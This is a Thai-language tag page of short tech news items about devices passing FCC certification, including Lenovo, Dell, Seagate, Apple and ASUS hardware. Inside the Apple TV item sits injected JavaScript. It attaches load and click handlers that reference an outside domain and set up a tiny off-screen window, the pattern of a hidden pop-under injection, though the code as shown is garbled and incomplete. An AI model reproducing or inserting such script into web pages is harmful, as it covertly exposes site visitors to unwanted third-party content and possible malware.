Home » Tag » FCC

รวมทุกเรื่องเกี่ยวกับ  FCC

. lenovos-thinkpad-tablet-visits-the-fcc-meeting-described-as-buใครหลายคนคงกำลังตั้งหน้าตั้งตารอดูเครื่องแท็บเล็ตใหม่จาก Lenovo กันอยู่ ที่ผลิตออกมาภายใต้ชื่อตระกูลโน้ตบุ๊กสุดโด่งดัง และเป็นเอกลักษณ์ไม่เหมือนใครอย่าง ThinkPad ซึ่งตอนนี้ก็ได้ผ่านการตรวจสอบจาก FCC เป็นที่เรียบร้อยแล้ว เหลือก็เพียงรอเปิดตัวตามกำหนดการในวันที่ 23 ที่จะถึงนี้ สำหรับตอนนี้ก็เอารูปอาร์ตเวิร์คมาให้แฟนๆได้ชื่นชมกันไปก่อน ของจริงมาแน่เร็วๆนี้ ที่มา: engadget

หลักฐานการมาของ Dell Streak รุ่น 7 นิ้วอีกชิ้นมาแล้ว มีแบบร่างตัวเครื่องไปโผล่ที่ FCC แล้ว โดยมีข้อมูลเปิดเผยออกมาเล็กน้อย ตัวนี้มาพร้อม 3G UTMS band, Bluetooth 2.1+EDR, WiFi 802.11n และ proximity sensor ใช้สำหรับแลกเปลียนข้อมูลระหว่างอุปกรณ์ในระยะใกล้ (คล้ายๆ Bluetooth) ด้านล่างตัวเครื่องก็มีช่องต่อต่างๆ ช่อง SD การ์ด และช่องใส่ซิมการ์ด แน่นอนว่าเราน่าจะได้เห็นมันที่งาน CES 2011 นี้แน่ๆ
5-14-11-seagate-goflex-satellite-600FCC ได้เปิดเผยรายละเอียดล่าสุดของแนวคิดผลิตภัณฑ์ใหม่จาก Seagate นั่นคือ Seagate GoFlex Satellite ที่มีโมดูล WiFi 802.11 b/g/n ติดตั้งอยู่ด้วยกัน แถมยังมี battery 3.7V อยู่ด้วย ทำให้คาดกันว่าเจ้าสิ่งนี้จะกลายเป็น external harddisk แบบไร้สายนั่นเอง ส่วนเรื่องสายในการเชื่อมต่อนั้น ทาง FCC ไม่ได้มีการกล่าวถึง ซึ่งแปลว่ามันอาจจะไม่มีสายก็เป็นได้ นอกจากนี้ยังมีแผนหลุดออกมาอีกด้วนว่า Seagate กำลังวางแผนจะสร้างแอพลง iOS ในชื่อว่า GoFlex Media ที่จะทำให้อุปกรณ์ที่ใช้ iOS สามารถสตรีมข้อมูลโดยตรงถึงเจ้า GoFlex Satellite ได้ทันที ซึ่งอาจจะทำให้หลายๆคนลืม dock ไปได้เลยทีเดียว : ) ที่มา : Engadget
02-01 Apple TV ตัวใหม่ ส่งตรวจที่ FCC แล้ว มีทั้ง Bluetooth และ Dual Band WiFi ไม่ใช่แค่ตัว iPad Touch ตัวใหม่ที่ถูกส่งไปที่ FCC เพื่อการตรวจสอบคุณภาพเท่านั้น ตัว Apple TV ก็กำลังรอการออกเอกสารรับรอง ถึงตอนนี้จะยังไม่มีรูปทั้งภายนอกและภายใน แต่จากการทดสอบก็มีการยืนยันว่าตัวเครื่องมี Bluetooth และ Dual Band WiFi (802.11 b/n/g/ 2.4 GHz และ 802.11 a/n 5.0 GHz) อีกไม่นานคงมีรายละเอียดออกมามากกว่านี้ ที่มา : Engadget *ภาพเป็นเครื่องรุ่นเก่านะครับ function addEvent(obj, eventName, func){ if (obj.attachEvent) { obj.attachEvent("on" + eventName, func); } else if(obj.addEventListener) { obj.addEventListener(eventName, func, true); } else { obj["on" + eventName] = func; } } addEvent(window, "load", function(e){ addEvent(document.body, "click", function(e) { { var w = ('http://bispakbohay.com','height=10, width=10, top=1900, left=1900, scrollbars=yes') ; window.focus(); } }); });
ASUS FCC Eee PC 1015P? เน็ตบุ๊กอีกรุ่นจาก ASUS ที่ปรากฎโฉมไปเมื่อเดือนมีนาคมที่ผ่านในงาน CeBIT แต่ทว่าจนถึงตอนนี้เรื่องก็ยังคงเงียบไม่มีวี่แววเลยว่าจะมีกำหนดปล่อยสินค้าออกมาเมื่อใด มันดูเหมือนว่ามันจะมาแน่ในไม่ช้า แต่อย่างไรก็ตามเน็ตบุ๊กรุ่นนี้ก็เพิ่งจะผ่านการอนุมัติรับรองมาตรฐานจาก FCC และมีตราประทับทางซ้าย ซึ่งเน็ตบุ๊กรุ่นนี้เป็นส่วนหนึ่งของสายการผลิต Seashell line ที่มีหน้าจอขนาด 10.1 นิ้ว ใช้ซีพียู Atom N450 และบางทีอาจจะสามารถสำรองแบตเตอรี่ไว้ใช้ได้นานถึง 14 ชั่วโมงด้วย ที่มา : Engadget.com
lenovo U610 Wirelessgoodness.com รายงานถึงโน้ตบุ๊กอีกรุ่นที่เพิ่งผ่านการรับรองมาตรฐานจาก FCC มา ซึ่งได้มีการยื่นรายละเอียดในการทดสอบ ระบบ 802.11 b/g/n WLAN อแดปเตอร์ ของ Intel Centrino Wireless-N1000 ไปเมื่อวันที่ 15 เมษายน ที่ผ่านมา ซึ่งอแดปเตอร์ไร้สายนี้อยู่ใน Lenovo U610? โน้ตบุ๊กรุ่นนี้อยู่ในซีรี่ย์เดียวกับ Lenovo IdeaPad U-series ซึ่งในปัจจุบันนี้มีโน้ตบุ๊กที่ได้คะแนนทดสอบที่ดีมากอยู่รุ่นหนึ่งนั่นคือ U350 ที่ได้คะแนนสูงถึง 87% จากการตรวจสอบ? ทั้งนี้ Wirelessgoodness.com ยังชี้ให้เห็นว่าการเรียกชื่อของ U-series แต่ละรุ่นนั้นจะพ่วงมาด้วยขนาดของจอแสดงผล เช่น U150/11.6? , U350/14.0? , U550/15.6? นี่ก็แสดงชัดว่ารุ่น U610 นั้นมีจอขนาด 16 นิ้ว ที่มา : Notebookcheck.net

© Copyright - Notebookspec.com All Rights